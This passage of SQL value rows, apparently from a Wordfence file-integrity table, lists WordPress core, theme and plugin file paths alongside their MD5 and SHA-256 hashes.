(0x4d8804e3aa793b7cc71d0903a441eb97, 'wp-content/plugins/js_composer/assets/js/dist/vc_grid.min.js', 0, 0xafbf7bb3e39f8ffb5d62636f14fe7623, 0xafbf7bb3e39f8ffb5d62636f14fe7623, 0xf657ea0186b93d302567ebbc6e3b4cdc68bc735c797e09f02527d141aa1eb48e, '', 0, '?'),
(0x4d88b83f944cc4233342be7f28614d67, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_empty_space.php', 0, 0x02b4504ef5d2158adfa57861bf07967a, 0x02b4504ef5d2158adfa57861bf07967a, 0xf8e680fc3e6dfa6641a62f80d29141aac0c178514844fe54d380a86cebfa39dd, '', 0, '?'),
(0x4db23e7316729df95d9bde02dae75c99, 'wp-content/plugins/js_composer/assets/js/dist/page_editable.min.js', 0, 0xc5681e5416b93c5a5c1cb05d4cff59cd, 0xc5681e5416b93c5a5c1cb05d4cff59cd, 0xa53fdc1fc3bdea6d7f4f9790bdebe7bcdd16f69c61ec5077107389a6160d3d7f, '', 0, '?'),
(0x4dd0a0009a419faabb3951de2ba0cd08, 'wp-includes/js/admin-bar.min.js', 1, 0x00000000000000000000000000000000, 0x990a02987267bae995291b115857b5af, 0xa3d1ca16d15b72858f644a32b3615dad165182912eb2053739994115bf46f449, '', 0, '?'),
(0x4dd8beb749eb9ad6ece6e0627a6eec52, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg', 0, 0xbb7cedb1db053abc0d683747cca3115f, 0xbb7cedb1db053abc0d683747cca3115f, 0x257d4060968c3d69fe841cc8e567371b3ff542606943729d3f79da17b085e4e6, '', 0, '?'),
(0x4ddb9f96c388c9b8bc05b863957fc6eb, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_next_24px.svg', 0, 0x1f1ae61ded272ab16d26d98b1b190645, 0x1f1ae61ded272ab16d26d98b1b190645, 0xdfd763b591759689f2493f374d182690e6f1d438df5b9455fbffbf4d0aaf0e4c, '', 0, '?'),
(0x4ddf6e4e7424eefd3b47a7e2d18eb864, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_pricing.php', 0, 0xcc94d63db03e4190da5594d3d9adb77b, 0xcc94d63db03e4190da5594d3d9adb77b, 0xa9557c71e87fecc423e47aefac70d4b9420ae601f6c730a379fb8c906f2b26a2, '', 0, '?'),
(0x4de53b43e5cc02cfd5d5385979efb28f, 'wp-includes/js/twemoji.min.js', 1, 0x00000000000000000000000000000000, 0xbd911c47ffa6cebe9968e2c5c81af2c1, 0x7c289bb94f7c9d7a258261d3ae8804d350ec8580c8f5c98afbfa64f8ce8a5e5a, '', 0, '?'),
(0x4de5a2929c7fb53642fe1db34f8c3e13, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg', 0, 0x01453cfefa83a235a19c5df910d6b678, 0x01453cfefa83a235a19c5df910d6b678, 0xb2df07453caa6f008d83dea32cbcf8f43b6d880c5c2050b7644af419f102d27b, '', 0, '?'),
(0x4df295a3c426a87c5368eaaddac5a8f7, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg', 0, 0xc872c799cb4299a6f95526d0140bf5c0, 0xc872c799cb4299a6f95526d0140bf5c0, 0x5deb42b25ccd1039bd66d12175cbdd25375c0bbee2328a5dfa5089e75c55f87c, '', 0, '?'),
(0x4dfa705bf4add4d7586a95ee9e130fb5, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-flickr.php', 0, 0x6a16521978101f9cc3aece038bf55d26, 0x6a16521978101f9cc3aece038bf55d26, 0x50e69c191551c14675ae3771bfa6c087ed69a4453dd5f868e769ac769d005fb7, '', 0, '?'),
(0x4dfc90c149824dd4effcc0724490f52d, 'wp-includes/post-template.php', 1, 0x00000000000000000000000000000000, 0x0222c97537f0e0e9d5e8fa0bdb193a15, 0xf90a9055a68cc73b4c9f6f0fe0718167573943b89621a3507dd0a9fe4056d6e1, '', 0, '?'),
(0x4e12a0366066852ed97bb530c73a03a4, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fire.svg', 0, 0x83b44c83c4d326583200a0a1d1b4cf33, 0x83b44c83c4d326583200a0a1d1b4cf33, 0x46518cea091d0f97d3b5aec90d4b9835102665535f2aa557eb9d469a6576a582, '', 0, '?'),
(0x4e379741e4b400c26e6e56bed69117ed, 'wp-content/plugins/wordfence/images/checkbox.png', 1, 0x00000000000000000000000000000000, 0x22b30ec8470dfb18367cf48898801527, 0x90f082797e6077286ad77e01de3deba4bc26b7fdddb48adfec51113e605ede78, '', 0, '?'),
(0x4e3dae66d01b3e244b8ae4e248bc54ce, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php', 1, 0x00000000000000000000000000000000, 0xc7d3eb17913f8f477bf214f58fb8f167, 0xc480d0a03c579f3b2d181af1808d99be9728432bbc2c4dfe95cc0255e2e15736, '', 0, '?'),
(0x4e4137253ae0f74ea925ba239c1057f0, 'wp-content/plugins/wordfence/js/wfdashboard.1579191227.js', 1, 0x00000000000000000000000000000000, 0xa9a3d4bdac509facb0cd60df1d7b69b9, 0x3d50af7ad772941e8a8a21e03f771ab42f6421b7bd4cd3aa12c41dea9d3121b7, '', 0, '?'),
(0x4e59d13eeddc2f71ce1921f4f77773e9, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_posts_slider.php', 0, 0xcded6f4afd117244a71a8cd5d0863f30, 0xcded6f4afd117244a71a8cd5d0863f30, 0xb9af2b12b9220298ed4c71904578faac96e29e93f1cd0a2c9b3d3c8152e7f6fd, '', 0, '?'),
(0x4e5be33eb92ec360da93dd25c79add96, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg', 0, 0x776a6e3ef1c8f2697ae8d826044702ea, 0x776a6e3ef1c8f2697ae8d826044702ea, 0xd28073bd8b11a73c3a797bf8c74303bd644b06ccdd3bef5d1b20a7d0fcd1d52c, '', 0, '?'),
(0x4e69c57e09d5608f16f8e0ae0357b045, 'wp-content/plugins/wordfence/lib/wfAlerts.php', 1, 0x00000000000000000000000000000000, 0x5dafcd13352b36c42e5a4db090802ea6, 0x9937c99f99f8c353c40559f2505709b84fb058787915022a69eef8f565934859, '', 0, '?'),
(0x4e788cfe8cbb999a6015977acae2e0ae, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg', 0, 0x87c67fbe7c42ee84e0eb1984067f46cc, 0x87c67fbe7c42ee84e0eb1984067f46cc, 0xebab7c93198729762e98dca44f48f4474f5c7ae29c6c217f5aa8c2b414bc36dd, '', 0, '?'),
(0x4e7a5b8a48c5f3761dbde25f359bca0d, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/check_table.php', 0, 0xdd2ea6a6bd5c28d689e4a3aaa529a6b7, 0xdd2ea6a6bd5c28d689e4a3aaa529a6b7, 0x06251bb0b311ef4c1cd77ac4a3bd924a739425af044cda7493fbd214e886ab96, '', 0, '?'),
(0x4e7cfec2874ad0b2aa7a6ed7f6117377, 'wp-includes/pluggable-deprecated.php', 1, 0x00000000000000000000000000000000, 0xe463b18764f9a900ccfe7eb7356a12c3, 0x10eb794a089ca010c20a237874df54ec2f7aff57c5fd6bedd5d59e176181e662, '', 0, '?'),
(0x4e8f33dd6a4070753593abb6bf5e9b86, 'wp-includes/js/tinymce/skins/wordpress/images/more.png', 1, 0x00000000000000000000000000000000, 0xfcb7bcd40abc0a6d003bfc0fcbabe67a, 0x2490b30676e7da6f5e841bb2d8559b20bf41008febf43af28d5c43a87515bfbd, '', 0, '?'),
(0x4e9f187291e9e45db188c83183f88b2f, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_tabs.php', 0, 0x4fdb5144c055589de38c4fe282485019, 0x4fdb5144c055589de38c4fe282485019, 0x6fbf85648fe69e4c35cce351046033d175c211f16ee7b315774f24278cdf6ebc, '', 0, '?'),
(0x4ef1080c93083647986f74bb13656113, 'wp-content/plugins/js_composer/config/content/shortcode-vc-message.php', 0, 0x9ccc21e4d58eb6b49be96662e103e14b, 0x9ccc21e4d58eb6b49be96662e103e14b, 0xea13573639de929c7a54ba9ec390fcb6011ba686d863e586f228fb887544f8f0, '', 0, '?'),
(0x4ef1e3fe4856fbae13d50cf57db63447, 'wp-admin/css/customize-widgets-rtl.css', 1, 0x00000000000000000000000000000000, 0xd86d15f33703587a4af713132b2936be, 0x9bd01f63985ac935fca82ac00fcc3affde0bc7a2ff56e9fe93eeff52e076c404, '', 0, '?'),
(0x4f0987d253a0fd95c723c5ff5969f276, 'wp-admin/includes/class-wp-list-table.php', 1, 0x00000000000000000000000000000000, 0xc469e066cb3c29109fff898c97d2e043, 0xc955e8ee33abbed946a885fe554d90d6a541c778f1f6575c3b894fde3492eb3f, '', 0, '?'),
(0x4f0cfc391d0a71ba8cc71763c87835ed, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_flat_24px.svg', 0, 0xe18efd149959a8e2880d9fadee7e5078, 0xe18efd149959a8e2880d9fadee7e5078, 0xf4d1b3bc015eb0d5b462704690a4b34ec9e451d89aee5f66ffa20e33d5394a74, '', 0, '?'),
(0x4f0e1ea3055a42e30f5683b6ff0f02a0, 'wp-content/plugins/js_composer/include/autoload/vc-pointers-backend-editor.php', 0, 0x2682e5a9d4e1f4951dd68bbbc0bf6ab4, 0x2682e5a9d4e1f4951dd68bbbc0bf6ab4, 0xe5ecad79ee09daccc7b84098d44977cfbe1e0fdaafb41302e6c3716176d1b4f6, '', 0, '?'),
(0x4f175cd529ea18983307f50ba0503534, 'wp-content/plugins/revslider/release_log.html', 0, 0x44028ae686347f446d7d86332d8b98a7, 0x44028ae686347f446d7d86332d8b98a7, 0x76b5494d5d9783c054a36a6b4869af57ca19018ce3ff7b29eed9ee9ee9f361e3, '', 0, '?'),
(0x4f1784d2bd5054ed5e95347ec514c542, 'wp-includes/css/dist/editor/style.css', 1, 0x00000000000000000000000000000000, 0xf8b85f00c1b9dfc396d3d88b3e82e2d1, 0xf073ff68ca4e06f4fd78148d5216cc885cf5b91e3e6289e9c640a8173a65eda8, '', 0, '?'),
(0x4f1a902746e1757b8bd2f552ff7f116e, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg', 0, 0x9833f654b13c0a9241e5d683f94e4ae2, 0x9833f654b13c0a9241e5d683f94e4ae2, 0x585c7f8400e3dda8451ce2cd34636ba25856720bb8886727ca5d57e0f2f49004, '', 0, '?'),
(0x4f203d28088d3acbc43ce109de3146bf, 'wp-includes/class-wp-feed-cache-transient.php', 1, 0x00000000000000000000000000000000, 0x8678a8dd3f5eeebba13e19df19b34ff4, 0x3a98cc3b0268d3217845d41b7afb0313af502ba66456a4021d30978ef9b944b5, '', 0, '?'),
(0x4f2bfdaddb5b9b4942f78ec96d896d27, 'wp-content/plugins/wordfence/images/wf-central-logo.svg', 1, 0x00000000000000000000000000000000, 0x71e0080b1d1228cfc556d1a481aaeaae, 0x00117b0daadf98b24a2fd720f85e862be11ef52cceec5399d007bd8b9fe18d0f, '', 0, '?'),
(0x4f348bc7b3571c51990094d252f8ef0f, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc', 1, 0x00000000000000000000000000000000, 0x3ec788adbb0519a92243e569789cfcb9, 0xf0aacb0b78e79caa2199a29fc47df2971ab685981eca0e8257aaaffa0fcb6411, '', 0, '?'),
(0x4f3dfcc868b7007d4fede572104ca362, 'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php', 1, 0x00000000000000000000000000000000, 0x5a9a55f7af7e13bc4c35c2401a56550f, 0x2fa772d6ec5484726dac9a17a5d847ad1fd181a00daa2598650dd3ed7ce2fa5b, '', 0, '?'),
(0x4f4017685ac898e5c2916a7c3fdbe773, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-footer.tpl.php', 0, 0x09f345fb75bad850ced9bc2d829269a8, 0x09f345fb75bad850ced9bc2d829269a8, 0x30d7bdb4136aab5e92e133dfcb210885c2d2adec6f4f8c9ad044e9a573e4efba, '', 0, '?'),
(0x4f47e5ab3e966bc89b7aed5b9d327bfb, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-zone-b.php', 0, 0x123b910e0faa1c7b29779e1dce45b7f8, 0x123b910e0faa1c7b29779e1dce45b7f8, 0x7701a14c043c94065899533c132ef1de5f74d9de953bd84ff6e8c07b593ac720, '', 0, '?'),
(0x4f53ef59d3577a213812f5caa36a1fb1, 'wp-content/plugins/wordfence/views/gdpr/banner.php', 1, 0x00000000000000000000000000000000, 0x2a4b840e60813bc28200d67d7f94860f, 0x2c8c03636e39ebe5db9d244f95d6fa60bafd268f70f5548d4f58d66905d8b3ef, '', 0, '?'),
(0x4f6c714363db8ed0efd6cae3cfccd0cd, 'wp-admin/css/forms-rtl.css', 1, 0x00000000000000000000000000000000, 0xd010d243e2c088bda116a757e7566bda, 0x1721064995217c3f2cda5c7d541c80c86d981b6d45fe98b7f0c9b6ea46f682cb, '', 0, '?'),
(0x4f7913997d4d6190cd13885fd6fa9349, 'wp-includes/Requests/Exception/HTTP/504.php', 1, 0x00000000000000000000000000000000, 0x02d76d8cccaa446293201112908a2aa5, 0xf93caf1098a3932142ac7c24146ba8aebcdd88a01f23208c65ac69142530031d, '', 0, '?'),
(0x4f7dfd57ad99cce2d97b2252a2a86dbe, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/tabs/vc_accordion.js', 0, 0xdf574c0437ef0188841f4aecc4009945, 0xdf574c0437ef0188841f4aecc4009945, 0xa218bc53cfb00985a26b6ad2281786aebb65c18cb4c807b8d6485b9a3baa67e9, '', 0, '?'),
(0x4f82e6bdbc076d24b8f29e97dd8b265f, 'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php', 1, 0x00000000000000000000000000000000, 0x317aa7c2b67e70512eb508b529215cc5, 0x6f72eb5bb74103527e7e479575dfb09551d24ed2c75a6b0051fd53654f13be17, '', 0, '?'),
(0x4f90fb5ca9a2b55035d1d3ff7bbe52ae, 'wp-admin/plugins.php', 1, 0x00000000000000000000000000000000, 0xe64061556dee0a7748cca6487ada1712, 0x66a25ddaa47e96f2789c0868e4d62394491e3fd6fb38fd47cb70502c916ab3d7, '', 0, '?'),
(0x4f95a78696456b268a9bdd1ebbd64f9e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg', 0, 0x1cb87fe1b4a8dee851c0ae5803c8edc4, 0x1cb87fe1b4a8dee851c0ae5803c8edc4, 0x382e85692d88df874cfaac2e90c157e68eb2e10bb5a320a761afea4eb6ce6108, '', 0, '?'),
(0x4f9e454cab76984cc5b81a3656260c18, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg', 0, 0x998bccba91ffc55200d630801db8e950, 0x998bccba91ffc55200d630801db8e950, 0x4f33150ccdceaa296aaae00ac96d0255a4ba309337eabf4312b69a16cdef6ec7, '', 0, '?'),
(0x4fa783b5e026c27281e8938f951eea20, 'wp-admin/freedoms.php', 1, 0x00000000000000000000000000000000, 0xfcca25f83d7824e50e5c24e06056ab72, 0xfd241ba00216fc9619e06c4271034cc97c37540afb77dc195e1db5f3ee660c5f, '', 0, '?'),
(0x4facacfab352af72bea9a3e844953f97, 'wp-admin/js/postbox.min.js', 1, 0x00000000000000000000000000000000, 0x117e10b1b305c87fcdcd57b122188e55, 0x572198518519e4c2becf90ed9354d397955c0aa0c02df2eb17396ee1046701c1, '', 0, '?'),
(0x4fad7fad6cb5d76967f7f03ecfe73628, 'wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php', 0, 0xd9c81825e601f83ad530e131baeeb842, 0xd9c81825e601f83ad530e131baeeb842, 0x14c385bcee6a90d1a2e0bbb4f599977a231aa9af6da8a81094ae0c0544707b74, '', 0, '?'),
(0x4fe1fbc6d5de7920aefd6b1b010962b1, 'wp-admin/css/customize-nav-menus-rtl.css', 1, 0x00000000000000000000000000000000, 0x891c337677bb836662e8301d9be94544, 0x5d2840f6d751e52e57bac4f2f918addd22d4db2faccf8a6e1cafcbb1aefdb528, '', 0, '?'),
(0x4fe5ebcf11cce54849214b0621305bda, 'wp-content/plugins/wordfence/lib/menu_scanner_options.php', 1, 0x00000000000000000000000000000000, 0xf6aa3b201f39ce00996221e40ba01551, 0xdf4026dd4f1a71525fef77aaabf22952c7906c14904cf8607708d2afa5f9692c, '', 0, '?'),
(0x4fe82b08a4cec76cd1da00ccfb2e0995, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-button.php', 0, 0x8c169c62d6a4148495170e90bbdfdb3b, 0x8c169c62d6a4148495170e90bbdfdb3b, 0xb77ef2891faef314c96f3a0b499761591f11fa6b5890132a8639b65cea40d696, '', 0, '?'),
(0x4fed3565cceeee3b687a977740925719, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php', 1, 0x00000000000000000000000000000000, 0x9a5a3cba86e689c77b0e7e47e1a26628, 0xe7f3b42cd7915b1a13afa3d6fa40bf2bead6c23f78b392e3500ed31fddd090a7, '', 0, '?'),
(0x4ffe6875b247affde1b22600ef4cff1c, 'wp-includes/Text/Diff/Engine/native.php', 1, 0x00000000000000000000000000000000, 0xaf53f6d50c16840d93189e01247fd454, 0x53cfea0034e2a17640ddc5b1609b44472056cf75c065cb52fd9242e7ab87338c, '', 0, '?'),
(0x5006b66277bf3d82ccf594a969eb96d2, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php', 1, 0x00000000000000000000000000000000, 0x5c1ac1c44918057735416c4cdba2198d, 0xfae3b44b7bfe3808a6c0666c8185371e73855268cefaeb039ee5978bca039149, '', 0, '?'),
(0x501c45dbabbd37727c6f49b136fff03e, 'wp-includes/js/backbone.min.js', 1, 0x00000000000000000000000000000000, 0x2781e10bd1b33dacb15e164e8a1e872e, 0x52ebd2c2781a860f5ef76986eaf7bb3d2c113fe5c78ef69fc5e4cb13b443762e, '', 0, '?'),
(0x502084f4d24e741244abdd8c9f6e22b1, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0x610ca815c221b42caf91055ed2719714, 0x0858df8770f7d594c35a9d9210d089d2d6b16fc40dbb3dcbb83c21847eb233e6, '', 0, '?'),
(0x50265f23cf27dc047a54e20b868e0873, 'wp-includes/Requests/Exception/HTTP/417.php', 1, 0x00000000000000000000000000000000, 0x4270026a1b8e684f5ec0635c47201c23, 0x8098804ce15498b2d29824784473019a5ef9681d5f216b43bb223127fc995fd4, '', 0, '?'),
(0x50278328b502f4eb3f2b8b7ab49324a1, 'wp-admin/js/postbox.js', 1, 0x00000000000000000000000000000000, 0xdfa3d2ab3f0caa20db92a24bcc0ff904, 0x8f25d33c07fcf2d053ccf79337ba3d8d060068d39e39b72af685c39cbe49a911, '', 0, '?'),
(0x5037336fe8a90209a7eb00e63de18ad2, 'wp-admin/js/word-count.js', 1, 0x00000000000000000000000000000000, 0xa4dc4685332216c99b5efbcebf141d1a, 0xd359b9b53254e3a150559a43c7f49d0f1d6781eaaa834102d5ced985a0dd3edc, '', 0, '?'),
(0x504444e6799bfab95ef47efd190dc440, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jquery-ui-labeledslider.js', 0, 0x1c25d20ecb61701b1207cc88b5590c71, 0x1c25d20ecb61701b1207cc88b5590c71, 0x885f0fba7b4e9a51ae20084189efe89352cb5a9c75d77f69cce9dcaeb947acb8, '', 0, '?'),
(0x504a12927e5d0ef806fa3b209e8b6079, 'wp-includes/widgets/class-wp-widget-media-image.php', 1, 0x00000000000000000000000000000000, 0x6acef7ded8e334483fd8708f5e5e6a26, 0x1f8fad5e8ebe17be8cc6c87d3a16adfcf3d61d1e1e9ec696b0e47e8529ded7fb, '', 0, '?'),
(0x504b88b332b449aaf3abc10b29a50682, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php', 1, 0x00000000000000000000000000000000, 0x335bab680417f7056ba9646134ee1770, 0xf526fb21d5f8375ecffa409dd139a2adf94ecc420854c7feeddac7d6152a38d7, '', 0, '?'),
(0x505f775eae211752fdef33f131718edd, 'wp-content/plugins/js_composer/include/params/default_params.php', 0, 0xed40846d0c0fd998a93da2902aedfe22, 0xed40846d0c0fd998a93da2902aedfe22, 0x759a9d854f81170610a97f4d1c211dda6c0f8af02164b3c905fdf9aa7bf9c650, '', 0, '?'),
(0x5086b25b8844e15850f58061c91d89e9, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php', 1, 0x00000000000000000000000000000000, 0x9b06d8ef3b75c289fd1c53b982ecb56c, 0xba4d3e3a1c0df926e156fdcc60ce1a3ab64f30e90f53763b00fe0bc156b57708, '', 0, '?'),
(0x508865b4c39f20d48161fb93de83b003, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pizza_24px.svg', 0, 0xe5bc8dd93c42dd1d5b28ba76609181c4, 0xe5bc8dd93c42dd1d5b28ba76609181c4, 0x0153662d7b57027c5bc4d6fbca5cc1746f9f70c4957b400ba29ae800ddb7fb1e, '', 0, '?'),
(0x508ac510697aa174ee6103e9127dd461, 'wp-admin/users.php', 1, 0x00000000000000000000000000000000, 0xa453f7dc52ff2f59f9e69c4dd99db773, 0x5e7292df6bb5365bb3d21c87d83893d2b9666dd329eb275799e0b94aecbb6442, '', 0, '?'),
(0x5090137c0bdf911154efc667ee185230, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/google-fonts-admin.js', 0, 0x1b3ab2f45b17a668bad2c975bba8d06b, 0x1b3ab2f45b17a668bad2c975bba8d06b, 0x3665aba43953e5761dadedfa8125a873460179b09de1ab46564f42df9d9230c1, '', 0, '?'),
(0x50ad345d7ffdbfa451315fd1fc37b6f9, 'wp-content/plugins/Ultimate_VC_Addons/assets/fonts/Defaults.svg', 0, 0xf4ca5a42323b629c67e6a7776f67da68, 0xf4ca5a42323b629c67e6a7776f67da68, 0xa6a2666f90678c297ef09aa4ee519eaaca549aea8e1f50f309975ceab9f01b7c, '', 0, '?'),
(0x50b5e10a197fff65a1e4f075b5220eed, 'wp-includes/sodium_compat/lib/php72compat.php', 1, 0x00000000000000000000000000000000, 0x95c319e795f3e761a42051f59338c7b1, 0xfa11210a99f2074b07c1d66b19617b22f62bbcf24ee55a44edb44c1fbbac0cc1, '', 0, '?'),
(0x50c3ff40a184c93b0e623c0ab86311e1, 'wp-includes/class-wp-oembed-controller.php', 1, 0x00000000000000000000000000000000, 0x7ef51befb83c27b1bf19d409db7d7c21, 0x198a4502efbe334300d8543690c52e1e780663e884132bfc168f5f6af924049f, '', 0, '?'),
(0x50c64dee1ad649ccb88d10ddad596072, 'wp-content/plugins/wordfence/lib/wfHelperString.php', 1, 0x00000000000000000000000000000000, 0xa14f5688466144118e56de349834dcaa, 0x32b12d37f2d16e613541943efc63d6b41a4e412d95707be48a516ef3b51a9af4, '', 0, '?'),
(0x50cba6eeac2118236b53da5009f725ea, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg', 0, 0x94e44a5e419368668e6bf77234ea1491, 0x94e44a5e419368668e6bf77234ea1491, 0x83e80d95e534ce06577b5847d25a21d2ad7aa16e664626f2daca4200b8d493eb, '', 0, '?'),
(0x50de3124b61b1b89f3025c170f2ae543, 'wp-admin/images/stars-2x.png', 1, 0x00000000000000000000000000000000, 0xf5ea4194a79c23e653b24d0c65032e5e, 0x1e5baef2e880bffd5f280d68aad7e71559c188b454eea4b9f07f04df715ab1d5, '', 0, '?'),
(0x50e38501f130b981618bbc52d37a3d20, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf', 1, 0x00000000000000000000000000000000, 0xdb33e7676b65cdbfddbe8cdce17ca068, 0xd8488f8f7a166ae99ea825c2180e89b910b285703dda5ad5e096694e41875af4, '', 0, '?'),
(0x51020b8c657f866878f9b099f10f012e, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-woocommerce.php', 0, 0x16bf7f055f0dbba5e79bf2e76a919b41, 0x16bf7f055f0dbba5e79bf2e76a919b41, 0x95b63bb9db9fadae9ef6d84b1b588aaaec11c18027703228c0cd8da5046ae5d7, '', 0, '?'),
(0x510be727ea376459faeba7ce91247974, 'wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php', 0, 0x7c6adb704afe168faff58a39f00aed73, 0x7c6adb704afe168faff58a39f00aed73, 0x969e80c0d737c61010f2ca2e8ebaf5cbe22e485507c2dc370faecb01b21e28a6, '', 0, '?'),
(0x51132b5d2a0fa4ce508af3219efb0c7c, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_7_24px.svg', 0, 0x9c87de781f4227919f2c7d6d12f6e2d6, 0x9c87de781f4227919f2c7d6d12f6e2d6, 0x26b1f066547081553b52de1ce2d4993d9d844ca313c1e12de9b195c4cb16afdd, '', 0, '?'),
(0x512f815bd8940a11cff046283065f784, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg', 0, 0xe077487c7d0da2a00a8e4d5f2210496f, 0xe077487c7d0da2a00a8e4d5f2210496f, 0x6eb9ea0862a173b529ed2bf78682a1155cdbb38272889d7c96ab63261637ff40, '', 0, '?'),
(0x5137086db536510abcd2c557dcc19aed, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_vpn_key_24px.svg', 0, 0x4ffe2636bbd0509096816a9e036e65c5, 0x4ffe2636bbd0509096816a9e036e65c5, 0x858327cbc5649f8ca200d13b01abe2a6ebd82710acb7efdf8abb2069e60fd2e4, '', 0, '?'),
(0x513bdaf2e928fcb18fac4d1c702af18b, 'wp-admin/js/widgets/media-widgets.min.js', 1, 0x00000000000000000000000000000000, 0xdf2e2d4114e8251bb20c7ab20d24cf37, 0xed0bc90e88dba9a4339f197de82abc7d38ddd09bdaf20f5bef88b7c401dc7330, '', 0, '?'),
(0x5150551f7607c43b9dd5125aaf33e3b8, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_airline_seat_individual_suite_24px.svg', 0, 0x7ba42cf19bf79dc9711c07fc1c3c2b27, 0x7ba42cf19bf79dc9711c07fc1c3c2b27, 0x4df24d558ca234405688db789703470bae30bde2bdfd560d70262fb94ee27f7d, '', 0, '?'),
(0x5154abf1f22a018f66d75084e5a52ebf, 'wp-admin/includes/file.php', 1, 0x00000000000000000000000000000000, 0xa44c3ad56d649bda0e4f7c7be7e08a9c, 0x84fc4ad27f191fe3a9729bf25d4c7185f1b2c53a147750091f961756959071bb, '', 0, '?'),
(0x515997ea31f0546c92b9567203083c17, 'wp-includes/js/customize-views.js', 1, 0x00000000000000000000000000000000, 0x22729b3c60a2f3c416c5f944cd01e285, 0x6232bf164da8ff216f87133bb12df49217766571fccb5c66b45d6ca494c0b03a, '', 0, '?'),
(0x5165873286d305563fe0c8c028850b7d, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/expandable-section.min.js', 0, 0xdd3269cc80def0703da307e64d1c1ffe, 0xdd3269cc80def0703da307e64d1c1ffe, 0x8d7ba6913ca947cea573eadda477b00c8c1ff920d7cd70d561ed82c9dfa769f4, '', 0, '?'),
(0x51756f145058d8d80005ab15b853da9e, 'wp-admin/images/bubble_bg.gif', 1, 0x00000000000000000000000000000000, 0xfa7ecf673cc487f349a0c1ac1f1eae30, 0x272b1d75d257eb602d41b215b61ce80cfedd5327a47d537e53f5d262a4cc0397, '', 0, '?'),
(0x517afc345b34f949db0700128b237811, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg', 0, 0x4b2de8beb0cfd3094dc39ece3505aee2, 0x4b2de8beb0cfd3094dc39ece3505aee2, 0x91134f1d20c2d799c6f9237a8c32793b2f1c1dd14fea5d1af35ceb5537a63e84, '', 0, '?'),
(0x517c3d6ff06ab5fa7d1ba2a9166fdfe9, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/vc-google-fonts-param.js', 0, 0x902d30b36a442bb1fe835e8d3d5b49ea, 0x902d30b36a442bb1fe835e8d3d5b49ea, 0xb39c2c0e8be2988699579b96998539ff3d1108e4b8e2af463153075098a337fe, '', 0, '?'),
(0x517f1b7febf9ae90caae6f0702baa6fe, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/vticker.min.js', 0, 0xc056025ac056f1bfbdc0412ef1a6d866, 0xc056025ac056f1bfbdc0412ef1a6d866, 0xdab251ec8a63813ed37f3ee79607f7292ae1b88db3abaf49a015721695df7aa1, '', 0, '?'),
(0x5183fe636dd675581a33fb422b879e58, 'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php', 1, 0x00000000000000000000000000000000, 0xbf21fd1e2a866f1facb032c2af861224, 0x54f08cfb43574439f2bc832dcea7a5308f28b51a074abe6907c9d7f4e5d6c2f0, '', 0, '?'),
(0x518cb5a0f62988e7d7cc8b08705a702a, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg', 0, 0xd7fd5bb192c2de6275aab3d8f1d9f5f8, 0xd7fd5bb192c2de6275aab3d8f1d9f5f8, 0x267fd001e6bd2bf87ff87a05ffb6343d041db9eb6f583fed4ec6d8defb76eaf0, '', 0, '?'),
